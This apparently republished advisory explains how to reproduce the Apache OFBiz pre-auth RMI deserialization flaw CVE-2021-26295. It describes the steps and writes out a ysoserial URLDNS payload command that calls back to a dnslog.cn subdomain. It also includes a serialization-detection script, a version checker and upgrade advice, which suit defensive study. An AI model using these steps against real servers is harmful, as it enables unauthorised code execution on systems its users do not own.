2025-02-25 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article walks through reproducing the Apache OFBiz RMI deserialization vulnerability CVE-2021-26295: the affected versions, the reproduction steps, and the remediation.
01 Vulnerability overview
Apache OFBiz is an e-commerce platform for building large and medium-sized enterprise-level, cross-platform, cross-database, cross-application-server, multi-tier, distributed e-commerce application systems.
Apache OFBiz recently released a security update. Apache OFBiz contains a pre-authentication RMI deserialization vulnerability leading to command execution, which an unauthenticated attacker can use to take over the OFBiz server. Affected users are advised to test the fixed version as soon as possible and upgrade promptly.
02 Scope of impact
[Severity] Serious
[Vulnerability ID]
CVE-2021-26295
[Affected versions]
Apache OFBiz < 17.12.06
03 Vulnerability reproduction
(1) Build the vulnerable environment with Docker.
(2) Get a subdomain from a DNSLOG platform and generate the payload file with ysoserial's URLDNS gadget chain: java -jar ysoserial.jar URLDNS http://isnrvo.dnslog.cn > Dns.ot
(3) Use a Python script to decode the generated file and convert it to hex.
(4) Use the converted hex to construct the request packet and send it.
(5) Check the execution result on the DNSLOG platform.
As shown, the DNSLOG platform received the lookup, confirming that the server deserialized and executed the payload.
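From the defender's side, the observable artifact of a reproduction like the one above is a Java serialization stream arriving in an HTTP request body, whether raw, hex-encoded (as in step 3) or base64-encoded. The following detection helper is an added example and is not part of the original article; it relies only on the well-known Java serialization header (STREAM_MAGIC 0xACED, STREAM_VERSION 0x0005) and runs over constructed sample bodies, not real captures.

```python
import base64
import re

# Java serialization streams start with STREAM_MAGIC 0xACED followed by
# STREAM_VERSION 0x0005. Depending on how a request carries the payload it
# can appear as raw bytes, as a hex string, or base64-encoded: "rO0AB" is
# the base64 encoding of the bytes AC ED 00 05.
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"
HEX_MAGIC = re.compile(rb"aced0005", re.IGNORECASE)
B64_MAGIC = re.compile(rb"rO0AB")


def find_java_serialization(body: bytes) -> list:
    """Return the encodings under which a Java serialization header was found."""
    hits = []
    if JAVA_SER_MAGIC in body:
        hits.append("raw")
    if HEX_MAGIC.search(body):
        hits.append("hex")
    if B64_MAGIC.search(body):
        hits.append("base64")
    return hits


# Constructed sample request bodies (not real captures). The trailing bytes
# after the header are only there to make the samples look like streams.
SAMPLES = {
    "raw": JAVA_SER_MAGIC + b"\x73\x72\x00\x0cjava.net.URL",
    "hex": b"data=aced0005737200",
    "base64": base64.b64encode(JAVA_SER_MAGIC + b"\x73\x72"),
    "benign": b"<soapenv:Envelope><get-Value/></soapenv:Envelope>",
}


def scan_samples(samples=SAMPLES) -> dict:
    """Run the detector over every sample and report per-sample hits."""
    return {name: find_java_serialization(body) for name, body in samples.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name}: {hits or 'clean'}")
```

The same three checks transfer directly to a WAF or IDS rule: a match on any of the three encodings in a request body to an OFBiz service endpoint is worth an alert, since no legitimate client should be submitting serialized Java objects there.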
04 Remediation
Users are advised to check their installed version promptly (open the [OFBIZ_HOME/README] file and look for the line "Welcome to Apache OFBiz xxxx" to determine the version) and upgrade Apache OFBiz to the latest version.
[Patch information]
Patch name: Apache OFBiz remote code execution vulnerability patch
Patch link: https://ofbiz.apache.org/download.html#vulnerabilities
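To make the version check above repeatable across many hosts, the following script parses the "Welcome to Apache OFBiz xxxx" marker from a README and compares it against the fixed version 17.12.06 named in this advisory. It is an added example, not code from the article or the OFBiz project; the README fragments are constructed, and the marker format is assumed to be exactly what the article describes.

```python
import re

# The first fixed version according to the advisory above.
FIXED_VERSION = (17, 12, 6)

# Marker line the article tells the reader to look for in OFBIZ_HOME/README.
VERSION_RE = re.compile(r"Welcome to Apache OFBiz\s+(\d+(?:\.\d+)*)")


def parse_version(text: str):
    """Extract the version tuple from README text, or None if no marker is present."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def is_vulnerable(version) -> bool:
    """True when version < 17.12.06; missing trailing components count as 0."""
    padded = version + (0,) * (len(FIXED_VERSION) - len(version))
    return padded < FIXED_VERSION


def check_readme(text: str) -> str:
    """Classify a README's contents as vulnerable, patched or unknown."""
    version = parse_version(text)
    if version is None:
        return "unknown"
    return "vulnerable" if is_vulnerable(version) else "patched"


# Constructed README fragments (not copied from an OFBiz distribution).
OLD_README = "Welcome to Apache OFBiz 17.12.05\nApache OFBiz is an open source ..."
NEW_README = "Welcome to Apache OFBiz 17.12.06\nApache OFBiz is an open source ..."


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    if path:
        with open(path, encoding="utf-8", errors="replace") as fh:
            print(check_readme(fh.read()))
    else:
        print("old:", check_readme(OLD_README))
        print("new:", check_readme(NEW_README))
```

Run it as `python check_ofbiz.py /path/to/OFBIZ_HOME/README` on each host; an "unknown" result means the marker was not found and the version must be confirmed another way before treating the host as patched.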